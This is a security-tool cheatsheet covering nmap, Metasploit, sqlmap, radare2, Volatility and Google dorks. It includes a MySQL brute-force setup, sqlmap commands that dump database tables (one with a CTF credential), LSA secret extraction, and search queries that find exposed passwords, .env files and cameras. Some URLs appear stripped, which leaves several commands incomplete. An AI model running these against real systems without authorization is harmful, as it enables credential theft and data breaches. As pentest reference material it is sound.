Cheatsheet for various unix tools such as metasploit framework, enumeration, nmap, radare2 and volatility.


$ file file1 # magic numbers
$ strings file2 | more
$ xxd file3 | more # enhanced version of hexdump
$ binwalk file4


Server enumeration

$ id # current user info
uid=1004(user-name) gid=1005(main-group-name) groups=1005(main-group-name),33(www-data),998(other-group)
$ cat /etc/issue # distrib generic name, common on all distrib
Debian GNU/Linux 8
$ cat /etc/*-release # distrib details, name may vary, hence *
NAME="Debian GNU/Linux"
PRETTY_NAME="Debian GNU/Linux 8 (jessie)"
$ uname -a # Linux kernel info 32/64 bits
Linux hostname 3.16.0-4-amd64 \#1 SMP Debian 3.16.7-ckt25-1 (2016-03-06) x86_64 GNU/Linux


Kali - Steganography

$ exiftool myfile
$ binwalk -e myfile # to extract
$ steghide info myfile



$ /opt/metasploit-framework/bin/msfconsole
$ msf6> search mysql # search MySQL exploits
Matching Modules
   #   Name                                                  Disclosure Date  Rank       Check  Description
   -   ----                                                  ---------------  ----       -----  -----------
   10  auxiliary/scanner/mysql/mysql_login                                    normal     No     MySQL Login Utility
$ msf6> use auxiliary/scanner/mysql/mysql_login # use exploit, alias: use 10
$ msf6 auxiliary(scanner/mysql/mysql_login)> info # get quick exploit overview
Name: MySQL Login Utility
     Module: auxiliary/scanner/mysql/mysql_login
    License: Metasploit Framework License (BSD)
       Rank: Normal
Basic options:
  Name              Current Setting  Required  Description
  ----              ---------------  --------  -----------
  BLANK_PASSWORDS   true             no        Try blank passwords for all users
$ msf6 auxiliary(scanner/mysql/mysql_login)> show options # show only options, alias: options
$ msf6 auxiliary(scanner/mysql/mysql_login)> show actions # show only actions
$ msf6 auxiliary(scanner/mysql/mysql_login)> set STOP_ON_SUCCESS true # set action only for this exploit
$ msf6 auxiliary(scanner/mysql/mysql_login)> setg USERNAME root # set action globally for all exploits
$ msf6 auxiliary(scanner/mysql/mysql_login)> setg THREADS 20 # set multiple threads to run faster
$ msf6 auxiliary(scanner/mysql/mysql_login)> run # run exploit


Most common port can be found in any Unix distribution in /etc/services:

$ less /etc/services
tcpmux 1/tcp
echo 7/udp
discard 9/udp sink null
systat 11/tcp users
daytime 13/udp
netstat 15/tcp

This is to be used by programs by calling standard C APIs


$ sudo apt-get install nmap # linux
$ # for Mac
PS> curl ; expand-archive -path .\ -destinationpath . # for Windows with PowerShell
# You should also install Npcap (

nmap will install an updated version of /etc/services in /usr/share/nmap/nmap-services.


# {hostname} can be,,; 10.0.0-255.1-254
$ nmap {hostname} # basic nmap shows IP, if host is up and scan 1000 most common ports
Nmap scan report for ( Host is up (0.078s latency).
Not shown: 996 closed ports
22/tcp    open  ssh
80/tcp    open  http
9929/tcp  open  nping-echo
31337/tcp open  Elite
$ nmap {h} -O # adding OS detection
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 20 hops
$ nmap {h} -p 40000-45000 # scan from ports 40000 to 45000





Requires Python 2.*

$ git clone --depth 1 sqlmap-dev
$ cd sqlmap-dev
$ python2 ./ --auth-cred="natas17:8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw" --auth-type=BASIC -u "" --level 3 --dbms="MySQL 5.5" -p username --technique T -D natas17 -T users -C username,password --dump


Find an injectable GET/POST param, such as ?user=love.

$ sqlmap -x "" # sitemap
$ sqlmap -d "mysql://admin:admin@" # SQL connection string for direct access
$ sqlmap -u "" -p user # url with param
$ sqlmap -u "" --auth-type=BASIC --auth-cred="clear_user:clear_pwd" # basic auth
$ sqlmap -u "" --dbms="MySQL 5.5" # set the DNMS to MySQL to test only against it
$ sqlmap -u "" -p user --level 3 --dbs # find databases
available databases [2]:
[*] information_schema
[*] pentest_me
$ sqlmap -u "" -p user --level 3 -D pentest_me --tables # find tables
Database: pentest_me
[1 table]
| table1 |
$ sqlmap -u "" -p user --level 3 -D pentest_me -T table1 --columns # find columns
Database: pentest_me
Table: table1
[2 columns]
| Column   | Type        |
| col1     | varchar(64) |
| col2     | varchar(12) |
$ sqlmap -u "" -p user --level 3 -D pentest_me -T table1 -C "col1,col2" --dump # dump rows
Database: pentest_me
Table: table1
[3 entries]
| col1     | col2                             |
| user1    | 0xjsNNjGvHkb7pwgC6PrAyLNT0pYCqHd |
| user2    | MeYdu6MbjewqcokG0kD4LrSsUZtfxOQ2 |
| user3    | VOFWy9nHX9WUMo9Ei9WVKh8xLP1mrHKD |




Useful links


$ radare2 my_executable.exe # for Windows
$ r2 my_bin # for UNIX
[0x00401220]> # r2 opens a shell-like
[0x00401220]> i # file info
  file     ~\my_bin
  format   pe
  iorw     false
  mode     r-x
  size     0x3c94
  humansz  15.1K
  type     EXEC (Executable file)
  arch     x86
  binsz    15508
  bintype  pe
  bits     32
[0x00401220]> ? 0x636261 # debug string in various formats
  hex     0x636261
  octal   030661141
  int32   6513249
  string  "abc"
  binary  0b011000110110001001100001
  fvalue: 6513249.0
[0x00401220]> ls | grep 'test' # for Unix
[0x00401220]> ls ~ 'test' # built-in platform-independant grep ~ (can be used on Windows)
[0x00401220]> !uname -a && ./my_bin # execute any binary with the prefix "!"

Search and display

[0x00000010]> s # print current address
[0x00000020]> s 0x20 # go to address 0x20
[0x00000020]> pd 20 # print next 20 disassembly lines
[0x00000020]> iz # print all strings
000 0x0000100b 0x0040300b  29  30 (.rdata) ascii This is the first string\n
001 0x0000102c 0x0040302c 119 120 (.rdata) ascii This is another string!!\n


pdf print disassemble function

[0x00001573]> pdf @ main
|           ;-- _main:
/ (fcn) main 193
|   main (int arg_8h, int arg_ch);
|           ; var int local_1ch @ ebp-0x1c



$ wget<br/>
$ unzip
$ cp volatility_2.6_mac64_standalone/volatility_2.6_mac64_standalone /usr/local/bin
$ ln -s /usr/local/bin/volatility_2.6_mac64_standalone  /usr/local/bin/volatility
$ volatility -h


$ volatility -f file.raw imageinfo # Image info
$ volatility -f file.raw --profile=Win7SP1x86 pslist # Process list
$ volatility -f file.raw --profile=Win7SP1x86 pstree # Process list as a tree
$ [...] psscan # Hidden process list
$ envars # env vars
$ cmdscan # Command through console shell cmd.exe
$ filescan # File search
$ dumpfiles -D output/ -Q 0x000000003f22a930 # Dump file at memory address
$ printkey -K 'RealVNC\\vncserver' # Print Reg Key example 1
$ printkey -K 'Policy\\Secrets\\DefaultPassword' # Print Reg Key example 2
$ lsadump # LSA dump
$ screenshot -D output/ # Screenshot desktops
$ clipboard # Clipboard content

Command reference on


Google operators

Operator|Purpose|Mixes with Other Operators?|Can be used Alone?

  • intitle Search page Title yes yes Β 
    allintitle Search page title no yes Β 
    inurl Search URL yes yes Β 
    allinurl Search URL no yes yes
    filetype specific files yes yes Β 
    intext Search text of page only yes yes Β 
    allintext Search text of page only really yes Β 
    site Search specific site yes yes Β 

Any software

intitle:"index of /ftp" # directory listing
"index of" "" # directory listing containing a SQL dump
filetype:log inurl password login # a log file containing words "password" and "login"
inurl:"ViewerFrame?Mode=" # publicly available camera
filetype:env intext:"password" -git -svn -supportforums # search for a .env file containing "password"
filetype:sql intext:password | pass | passwd intext:username intext:INSERT INTO `users` VALUES # Generic SQL user/pass

Targeted softwares

filetype:log intext:SQLSTATE[HY000] [1045] Access denied for user intext:using password: YES intext:Stack trace # PHP PDO db password
intitle:'index of' "error_log" # Apache error_log dir
intitle:'index of' "access_log" # Apache access_log dir
intitle:"Index of /logs/" "lighttpd" # lighttpd log dir 
inurl:robots.txt intext:Disallow: /web.config # Drupal detection based on robots.txt
filetype:txt inurl:robots.txt intext:generated by PrestaShop # Prestashop detection
intext:"define('DB_PASSWORD'," ext:txt # WordPress PHP constants via txt file
filetype:env intext:"DB_PASSWORD" -github # WordPress PHP constants via .env file
inurl:/wp-content/uploads/wp-backup-plus/ # WordPress Backup plus extension
inurl:configuration.php and intext:"var $password=" # joomla config file
inurl:webman/index.cgi # Synology NAS
inurl:administrators.pwd # FrontPage admin credentials
intitle:"Swagger UI - " + "Show/Hide" # Swagger UI
inurl:"build.xml" intext:"tomcat.manager.password" # Tomcat Manager
intext:"PuTTY log" ext:log "password" -github # PuTTy log, not on Github
intitle:"index of" docker-compose.yml -git -support # Docker


